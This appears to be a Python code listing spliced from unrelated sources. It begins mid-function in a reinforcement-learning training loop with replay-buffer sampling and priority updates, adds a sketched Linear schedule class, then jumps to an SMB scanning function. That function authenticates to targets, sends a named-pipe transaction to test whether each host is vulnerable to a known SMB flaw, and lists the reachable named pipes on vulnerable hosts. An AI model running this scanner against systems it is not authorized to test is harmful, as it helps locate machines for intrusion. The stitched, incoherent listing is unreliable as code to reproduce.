                            "timing/update_priorities":
                            default(ledger['timing/update_priorities'].latest,
                                    sec),
                            "timing/update_priorities/mean":
                            default(ledger['timing/update_priorities'].mean,
                                    sec)
                        },
                                   silent=silent)
                except Exception as e:
                    pass
                if G.prioritized_replay:
                    logger.log(
                        t_step,
                        {"replay_beta": default(beta, lambda v: f"{v:.2f}")},
                        silent=silent)

            # note: learn here.
            if t_step >= G.learning_start and t_step % G.learn_interval == 0:
                if G.prioritized_replay:
                    experiences, weights, indices = replay_buffer.sample(
                        G.replay_batch_size, beta)
                    logger.log_histogram(t_step, weights=weights)
                else:
                    experiences, weights = replay_buffer.sample(
                        G.replay_batch_size), None
                M.tic('train', silent=True)
                x0s, actions, rewards, x1s, dones = zip(*experiences)
                td_error_val, loss_val = trainer.train(s0s=x0s,
                                                       actions=actions,
                                                       rewards=rewards,
                                                       s1s=x1s,
                                                       dones=dones,
                                                       sample_weights=weights)
                ledger['timing/train'].append(M.toc('train', silent=True))
                M.tic('log_histogram', silent=True)
                logger.log_histogram(t_step, td_error=td_error_val)
                ledger['timing/log_histogram'].append(
                    M.toc('log_histogram', silent=True))
                if G.prioritized_replay:
                    M.tic('update_priorities', silent=True)
                    new_priorities = np.abs(td_error_val) + eps
                    replay_buffer.update_priorities(indices, new_priorities)
                    ledger['timing/update_priorities'].append(
                        M.toc('update_priorities', silent=True))

            if t_step % G.target_network_update_interval == 0:
                trainer.update_target()

            if t_step % Reporting.checkpoint_interval == 0:
                U.save_state(os.path.join(RUN.log_directory, RUN.checkpoint))
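# The Linear schedule imported at the top of train() is not shown in this listing.
# A minimal sketch of the assumed behaviour (linear interpolation over a fixed number
# of steps, indexed by timestep and clamped at the final value), matching how
# schedules.eps[t_step] and schedules.beta[...] are used above:
class Linear:
    def __init__(self, n_steps, start, end):
        self.n_steps = n_steps
        self.start = start
        self.end = end

    def __getitem__(self, t):
        # clamp t into [0, n_steps], then interpolate linearly from start to end
        frac = min(max(t, 0), self.n_steps) / self.n_steps
        return self.start + frac * (self.end - self.start)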
def run(target):
    try:
        try:
            logger.verbose('Attempting to connect to %s' % logger.BLUE(target))
            conn = MYSMB(target, timeout=5)
            logger.verbose('Successfully connected to %s' %
                           logger.BLUE(target))
        except Exception as e:
            logger.red('Failed to connect to [{}]'.format(logger.RED(target)))
            logger.verbose('Got error whilst connecting: %s' %
                           logger.BLUE(str(e)))
            return False
        try:
            # login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None)
            # can add passthehash at some point
            logger.verbose('Attempting to authenticate to %s' %
                           logger.BLUE(target))
            conn.login(username, password, domain)
            logger.verbose('Successfully authenticated to %s' %
                           logger.BLUE(target))
        except Exception as e:
            logger.red('Failed to authenticate to [{}]'.format(
                logger.RED(target)))
            return False
        try:
            logger.verbose('Attempting to get OS for %s' % logger.BLUE(target))
            OS = conn.get_server_os()
            logger.verbose('Got Operating System: %s' % logger.BLUE(OS))
        except Exception as e:
            logger.verbose('Got error whilst getting Operating System: %s' %
                           logger.BLUE(str(e)))
            logger.red('Failed to obtain operating system')

        try:
            tree_connect_andx = '\\\\' + target + '\\' + 'IPC$'
            logger.verbose('Attempting to connect to %s' %
                           logger.BLUE(tree_connect_andx))
            tid = conn.tree_connect_andx(tree_connect_andx)
            conn.set_default_tid(tid)
            logger.verbose('Successfully connected to %s' %
                           logger.BLUE(tree_connect_andx))

        except Exception as e:
            logger.verbose('Got error whilst connecting to %s: %s' %
                           (tree_connect_andx, logger.BLUE(str(e))))
            return False

        # test if target is vulnerable
        logger.verbose('Testing if %s is vulnerable...' % logger.BLUE(target))
        try:
            TRANS_PEEK_NMPIPE = 0x23
            recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE),
                                      maxParameterCount=0xffff,
                                      maxDataCount=0x800)
            status = recvPkt.getNTStatus()
            if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
                logger.green('[%s] VULNERABLE' % logger.GREEN(target))
                vulnerable[target] = []
            else:
                logger.red('[%s] PATCHED' % logger.RED(target))
        except Exception as e:
            logger.verbose(
                'Got error whilst checking vulnerability status %s' %
                logger.BLUE(str(e)))
            return False

        pipes_found = []

        if target in vulnerable:
            logger.verbose('Checking pipes on %s' % logger.BLUE(target))
            for pipe_name, pipe_uuid in pipes.items():
                try:
                    dce = conn.get_dce_rpc(pipe_name)
                    dce.connect()
                    try:
                        dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
                        pipes_found.append(pipe_name)
                    except DCERPCException as e:
                        logger.verbose('Got error whilst binding to rpc: %s' %
                                       logger.BLUE(str(e)))
                        # the pipe is reachable even if the bind fails
                        # (e.g. transfer_syntaxes_not_supported on 32-bit targets)
                        pipes_found.append(pipe_name)
                    except Exception as e:
                        logger.verbose('Got error whilst binding to rpc: %s' %
                                       logger.BLUE(str(e)))
                    finally:
                        dce.disconnect()
                    vulnerable[target] = pipes_found
                except smb.SessionError as e:
                    logger.verbose(
                        'Got SMB Session error whilst connecting %s' %
                        logger.BLUE(str(e)))
                    continue
                except smbconnection.SessionError as e:
                    logger.verbose(
                        'Got SMB Session error whilst connecting %s' %
                        logger.BLUE(str(e)))
                    continue
                except Exception as e:
                    logger.verbose(
                        'Got error whilst connecting: %s' %
                        logger.BLUE(str(e)))
                    continue
        try:
            conn.disconnect_tree(tid)
            conn.logoff()
            conn.get_socket().close()
        except Exception as e:
            logger.verbose('Got error whilst disconnecting from rpc %s' %
                           logger.BLUE(str(e)))
            pass
    except KeyboardInterrupt:
        logger.red('Keyboard interrupt received..')
        quit()